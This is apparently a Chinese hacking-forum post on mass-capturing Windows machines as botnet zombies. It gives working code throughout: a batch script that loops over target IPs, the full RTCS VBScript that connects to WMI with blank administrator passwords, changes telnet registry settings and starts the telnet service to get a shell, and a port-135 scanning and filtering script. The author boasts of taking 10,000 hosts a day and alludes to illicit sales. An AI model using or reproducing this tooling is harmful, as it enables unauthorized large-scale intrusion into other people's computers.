135批量抓雞 依賴 古老得RTCS
上次看了那個也說一天抓1000只肉雞 由於我是開快進看的 沒仔細的看 我以為他是自動登陸telnet 所以我就暈死了 應為自動登陸telnet我以前研究很多 我由於我批處理我學的不怎麼樣也就會點皮毛就加了他 結果他一上來就開口批量開23賣2000RMB 人品啊 我倒 那鳥東西不清楚大家知道作者不 那是02年安全焦點的大哥寫的 我有RT整個全套程式碼的 一萬年前我就知道怎麼批量開23了 不廢話了先說其他的把 後來一位大哥把他的RT整套指令碼整合寫了一個RCMD1。05這個是目前的最新版好象
需要解決的問題我詳細的說一下把
首先要解決的就是批量開23了
rtcs指令碼(百度一下有下的找不到就是搜尋水品問題了) 裡面的程式碼如果懂VBS的朋友去看下 就是先用VBS遠端連線主機的wmi服務 然後剩下的是開啟和過認證部分 以前有一篇文章分析過說是作者寫的有一個小BUG 就是如果原來已經開啟的話可以直接轉到退出的 這裡不多說這個了
for /f "delims= " %%i in (nt.txt) do del %%i.bat
for /f "delims= " %%i in (nt.txt) do echo goto start>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo :start>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo cscript rtcs.vbe %%i administrator "" 1 23^|find "shell">>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo if errorlevel=1 goto b>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo if errorlevel=0 goto d>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo :d>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo SecureCRT.EXE %%i&goto exit>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo :b>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo cscript rtcs.vbe %%i administrator "" 1 23^|find "error">>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo if errorlevel=1 goto start>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo if errorlevel=0 goto exit>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo :exit>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo exit>>%%i.bat
for /f "delims= " %%i in (nt.txt) do start %%i.bat
exit
這個是我以前寫的一個批處理 有興趣的朋友可以看下 其實很簡單 外面流傳的需要過濾23 我的不需要過濾23 有興趣的朋友可以看下 程式碼正確性沒測試應為我寫過好幾個版本現在已經不記得哪個是可以用的了 但是思路很明顯的相信大家可以看明白
要解決的問題二
我也嘗試了用指令碼來實現先telnet ip 然後sendkey 後來發現問題大大的 只能一個一個種植不能實現批量種植 後來朋友給冰冰批量 就是現在大家可以在外面找的版本 他很好的解決了批量登陸和自動種植的問題 呼叫輔助工具 設定登陸指令碼然後自動種植 但是我相信用的朋友一定知道有什麼問題 telnet認證是很複雜的 此外容易出現提示丟失指令碼的錯誤
其他的不知道說什麼了 我今天上網給朋友搞東西 弄的累的要死 思路不是很清楚 我在總結下把
首先寫一個S掃描的BAT然後裡面用FOR迴圈自動整理IP 然後NT過濾 然後呼叫上面我發的批處理批量開23 然後寫一個批處理直接呼叫輔助工具自動登陸自動種植 效果如何 大家詳細的去看動畫就知道了
而後來我寫的一個版本 就很帥了 嘿嘿 保密中 應為工具是給兄弟群共享的 他們有業務來著 如果我把東西釋出了說是會幹掉我 怕怕 給會懂VBS的朋友說一下把 引導一下思路
前面的掃描和和NT過濾還是一樣的不說了 遠端連線wmi大家可以看rtcs的指令碼 關鍵地方就是下面了
難道遠端連線到了wmi服務就只有開telnet一條出路嗎 貌似wmi功能多多把 具體能幹什麼去看安焦點rtcs作者02年的文章把 目前我寫的指令碼和所有的工具打包起來也才70多K 同時開4個伺服器一天抓1萬隻肉雞 信不信由你 相信大家都知道recton裡有一個http種植者的功能把 去找找文章看人家怎麼實現的 最近風聲很緊有業務的朋友最好小心 最近的通道不是那麼安全
這個是rtcs的程式碼 自己儲存成VBS
on error resume next
if (lcase(right(wscript.fullname,11))="wscript.exe") then
set objShell=wscript.createObject("wscript.shell")
objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34))
wscript.quit
end if
if wscript.arguments.count<5 then
usage()
wscript.echo "Not enough parameters."
wscript.quit
end if
ipaddress=wscript.arguments(0)
username=wscript.arguments(1)
password=wscript.arguments(2)
ntlm=wscript.arguments(3)
port=wscript.arguments(4)
if password=chr(34)&chr(34) then password=NULL
if ntlm<0 or ntlm>2 then
usage()
wscript.echo "The value of NTML is wrong."
wscript.quit
end if
usage()
wscript.echo "Conneting "&ipaddress&"...."
set objlocator=createobject("wbemscripting.swbemlocator")
set objswbemservices=objlocator.connectserver(ipaddress,"root/default",username,password)
showerror(err.number)
wscript.echo "Setting NTLM="&ntlm&"...."
set objinstance=objswbemservices.get("stdregprov")
set objmethod=objinstance.methods_("SetDWORDvalue")
set objinparam=objmethod.inparameters.spawninstance_()
objinparam.hdefkey=&h80000002
objinparam.ssubkeyname="SOFTWARE/Microsoft/TelnetServer/1.0"
objinparam.svaluename="NTLM"
objinparam.uvalue=ntlm
set objoutparam=objinstance.execmethod_("SetDWORDvalue",objinparam)
showerror(objoutparam.returnvalue)
wscript.echo "Setting port="&port&"...."
objinparam.svaluename="TelnetPort"
objinparam.uvalue=port
set objoutparam=objinstance.execmethod_("SetDWORDvalue",objinparam)
showerror(objoutparam.returnvalue)
wscript.echo "Querying state of telnet server...."
set objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)
set colinstances=objswbemservices.execquery("select * from win32_service where name=’tlntsvr’")
for each objinstance in colinstances
if objinstance.startmode="Disabled" then
wscript.echo "Telnet server has been disabled. Now changeing start mode to manual...."
set objmethod=objinstance.methods_("changestartmode")
set objinparam=objmethod.inparameters.spawninstance_()
objinparam.startmode="Manual"
set objoutparam=objinstance.execmethod_("changestartmode",objinparam)
showerror(objoutparam.returnvalue)
end if
wscript.echo "Changeing state...."
if objinstance.started=true then
intstatus=objinstance.stopservice()
showerror(intstatus)
wscript.echo "Target telnet server has been STOP Successfully."
else
intstatus=objinstance.startservice()
showerror(intstatus)
wscript.echo "Target telnet server has been START Successfully!"
wscript.echo "Now, you can try: telnet "&ipaddress&" "&port&", to get a shell."
end if
next
function showerror(errornumber)
if errornumber<>0 then
wscript.echo "Error!"
wscript.quit
else
wscript.echo "OK!"
end if
end function
function usage()
wscript.echo "************************************************************************"
wscript.echo "RTCS v1.08"
wscript.echo "Remote Telnet Configure Script, by zzzevazzz"
wscript.echo "Welcome to visite www.isgrey.com"
wscript.echo "Usage:"
wscript.echo "cscript "&wscript.scriptfullname&" targetIP username password NTLMAuthor telnetport"
wscript.echo "It will auto change state of target telnet server."
wscript.echo "************************************************************************"
end function
經典吧,呵呵,我覺得,呵呵,管理員要給我加錢啊,呵呵
關於for迴圈 我解釋下
for /f這個這個參數列示對文字操作
tokens表示擷取 tokens=1,2表示選取1,2兩個部分 eol表示忽略 eol=-表示忽略-開始的行 delims表示分割符 delims=,表示對每行以“,”為分割符號對行進行分割字元
那麼我給大家寫一個S掃描自動整理IP的批處理把
s.bat
setlocal
cls
color A
title 自動抓雞v1.0
echo ======================================================
echo 自動抓雞v1.0
echo 作者:hurrytigar
echo QQ:30144942
echo emil:hurrytigar@163.com
echo hacked by hurrytigar
echo ======================================================
del result.txt
del s.txt
for /f "eol= tokens=1,2 delims= " %%i in (ip.txt) do s tcp %%i %%j 135 1000 /save
for /f "eol=- tokens=1 delims= " %%i in (result.txt) do echo %%i>>s1.txt
for /f "eol=P tokens=1 delims= " %%i in (s1.txt) do echo %%i>>s2.txt
for /f "eol=S tokens=1 delims= " %%i in (s2.txt) do echo %%i>>s.txt
del s1.txt
del s2.txt
del Result.txt
掃描那行的FOR迴圈 for /f "eol= tokens=1,2 delims= " %%i in (ip.txt) do s tcp %%i %%j 135 1000 /save
意思是說 從ip.txt中對每行以空格分割 然後取得分割後的第一部分和第二部分字元
第一個%%i是形參 代替你要取出來的部分 那麼後面的2個部分的%%i 和%%j表示取出的兩個部分按順序代替的引數了
後面的幾行都是掃描完成的result過濾整理 先忽略以空格 - P S開頭的行 然後用echo寫入文字來轉的
用法 大家把上面的批處理程式碼儲存成 s.bat然後在同一目錄建立一個ip.txt的文字
然後把下面的這些複製進IP。TXT裡面 (不需要整理 直接全放進去 漢字不需要去掉)
掃描和整理結束以後會有一個S。TXT文字 自己開啟看看效果把 ^_^ 忘了說了把s.exe ip.txt和s.bat放在同一目錄 好了我閃了.
相關文章
- 依賴倒置(DIP)與依賴注入(DI)依賴注入
- Maven依賴管理:控制依賴的傳遞Maven
- Maven依賴範圍及依賴傳遞Maven
- AI依賴算力,而算力依賴能源AI
- 探索 JavaScript 中的依賴管理及迴圈依賴JavaScript
- 【PY】PyQT 依賴QT
- angular依賴注入Angular依賴注入
- XUnit 依賴注入依賴注入
- golang 依賴管理Golang
- Struts 依賴注入依賴注入
- HTop依賴包
- 依賴注入?依賴注入是如何實現解耦的?依賴注入解耦
- 依賴引入 | Android依賴引入史上最全攻略Android
- 使用IDEA模組之間依賴找不到依賴類Idea
- 淺析依賴倒轉、控制反轉、IoC 容器、依賴注入。依賴注入
- ASP.NET Core中的依賴注入(2):依賴注入(DI)ASP.NET依賴注入
- Maven依賴機制Maven
- [譯] 依賴注入?? 哈??依賴注入
- Angular 依賴注入原理Angular依賴注入
- Hue安裝依賴
- Maven 依賴關係Maven
- govendor依賴包管理Go
- .Net Core — 依賴注入依賴注入
- 理解 Angular 依賴注入Angular依賴注入
- Spring依賴注入Spring依賴注入
- Spring依賴注入---Spring依賴注入
- Guice 依賴繫結GUI
- 依賴注入系列教程依賴注入
- 我看依賴注入依賴注入
- webapi - 使用依賴注入WebAPI依賴注入
- 依賴注入是否值得?依賴注入
- 控制反轉,依賴注入,依賴倒置傻傻分不清楚?依賴注入
- 依賴倒置、依賴注入和控制反轉傻傻分不清楚?依賴注入
- .NET IoC模式依賴反轉(DIP)、控制反轉(Ioc)、依賴注入(DI)模式依賴注入
- 直播軟體原始碼,pom 依賴遇到 build 下的依賴報錯原始碼UI
- maven依賴jar包更新,業務jar需同步更新(業務jar依賴API)MavenJARAPI
- saltstack對遞迴依賴條件(死迴圈依賴)的處理遞迴
- ASP.NET的快取依賴機制-SQL快取依賴篇ASP.NET快取SQL